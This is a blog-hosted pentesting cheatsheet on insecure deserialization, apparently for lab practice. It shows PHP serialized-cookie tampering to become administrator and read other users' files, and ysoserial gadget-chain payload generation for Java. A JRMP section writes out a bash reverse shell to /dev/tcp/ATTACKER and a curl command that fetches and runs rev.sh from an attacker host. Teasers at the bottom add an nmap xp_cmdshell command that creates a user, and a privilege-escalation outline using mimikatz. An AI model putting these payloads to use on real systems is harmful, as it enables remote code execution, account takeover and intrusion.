Skip to main content

Insecure Deserialization Cheatsheet

By

 Any class that implements the interface java.io.Serializable can be serialized and deserialized. If you have source code access, take note of any code that uses the readObject() method, which is used to read and deserialize data from an InputStream.

The native methods for PHP serialization are serialize() and unserialize(). If you have source code access, you should start by looking for unserialize().

Basic Serialization

- look for cookies with base64 encoded or some kind of searialzed

you can update the admin;b:0 to admin;B:1 --> which makes us admin


PHP - Exploiting Data Types
- Look for cookies and any other serialized values
- Update the user value or the username to any user
- if required update the access token, serialize it and try to access unauthorized data

Example
Update the data from 
O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"msai659yp7cfu0magd7vm3siq9ls2cld";}
to
O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}

- Always try to update the content in the serialized object 
Update the object from 
O:4:"User":3:{s:8:"username";s:5:"gregg";s:12:"access_token";s:32:"favhu4mwxv64b6mz5x6ga79wxs5k95op";s:11:"avatar_link";s:18:"users/gregg/avatar";
TO
O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"zp46h5h7j8dbk07k04e57dgu67ayxsy7";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}

Magic Methods 

Magic methods are a special subset of methods that you do not have to explicitly invoke. Instead, they are invoked automatically whenever a particular event or scenario occurs

 __construct(), which is invoked whenever an object of the class is instantiated, similar to Python's __init__.

some languages have magic methods that are invoked automatically during the deserialization process. For example, PHP's unserialize() method looks for and invokes an object's __wakeup() magic method.

In Java deserialization, the same applies to the ObjectInputStream.readObject() method, which is used to read data from the initial byte stream and essentially acts like a constructor for "re-initializing" a serialized object. However, Serializable classes can also declare their own readObject() method as follows:

private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException
{
    // implementation
}
A readObject() method declared in exactly this way acts as a magic method that is invoked during deserialization. This allows the class to control the deserialization of its own fields more closely.

You should pay close attention to any classes that contain these types of magic methods. They allow you to pass data from a serialized object into the website's code before the object is fully deserialized. This is the starting point for creating more advanced exploits.



YSOSerial

#Requires Java 11 to run
sudo apt install openjdk-11-jdk
sudo update-alternatives --config java
java --version

Download the latest package from https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar 
java -jar ysoserial-all.jar CommonsCollections4 "nc 10.10.10.10 8080" 

#Remove empty lines 
java -jar ysoserial-all.jar CommonsCollections4 "nc 10.10.10.10 8080" | base64 -w 0 > output.txt

#Little bit of automation - generate all payloads at once
java -jar ../ysoserial.jar  >yso  2>&1
cat yso | tr -d ' ' | cut -d "@" -f 1 | sed '1,8d'> payloads.txt
while read payloadname; do java -jar ../ysoserial.jar $payloadname "ping 10.10.10.10 -c 3" | base64 -w 0 > $payloadname; done < payloads.txt

# Run TCP Dump to check if you are getting any response back
sudo tcpdump -i tap0 icmp

or better use Burp Extensions 
Java Serial Killer
Java Deserialization Scanner


Exploiting Insecure Deserialization using JRMP

#Host a Reverse shell 
python -m http.server 8000

rev.sh 
bash -c 'exec bash -i &>/dev/tcp/ATTACKER/9001 <&1'

#Start a listner 
java -cp /usr/local/bin/ysoserial-all.jar ysoserial.exploit.JRMPListener 80 CommonsCollections3 "curl http://ATTACKER:8000/rev.sh -o /tmp/rev.sh; bash /tmp/rev.sh"

# Generate the payload and send it 
java -jar /usr/local/bin/ysoserial-all.jar JRMPClient ATTACKER:80 | base64 -w 0 > output.txt

#Start a new listner
java -cp /usr/local/bin/ysoserial-all.jar ysoserial.exploit.JRMPListener 82 CommonsCollections3 "bash /tmp/rev.sh"

# Generate the payload and send it 
java -jar /usr/local/bin/ysoserial-all.jar JRMPClient ATTACKER:81 | base64 -w 0 > output2.txt
Labels:

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds...
Post a Comment
Read more

Windows Priv Escallation

By
1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD En...
Post a Comment
Read more

Forensics & Crypto

By
Online Decoder --> https://2cyr.com/decode/ Encoding errors -->  https://ftfy.now.sh/ File Signatures List -->  Click here PCAP Analysis: -->  https://www.packettotal.com/ Online Cipher Decryptors: CyberChef  - Cipher Decoder   Crack Station-Hash Cracke r Decrypt Any Kind of Hash 1)  Cipher Statistics 2)  Index of Coincidence Calculator - Online IC Cryptanalysis Tool 3)  Tools List (Awesome and Fantastic Tools) Available on dCode 4)  Solve an Aristocrat or Patristocrat 5)  RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data 5-1)  RSA - Find PQ using N 6)  BertNase's Own Hide content in a Image made of blocks - npiet fun! 7)  Vigenere Solver - www.guballa.de 8)  Fernet (Decode) 9)  Unicode Text Steganography Encoders/Decoders 10)  All in ONE encoders and Decoders Tool 11) Cryptii - Decoder Image Forensics: 1)  Forensical...
Post a Comment
Read more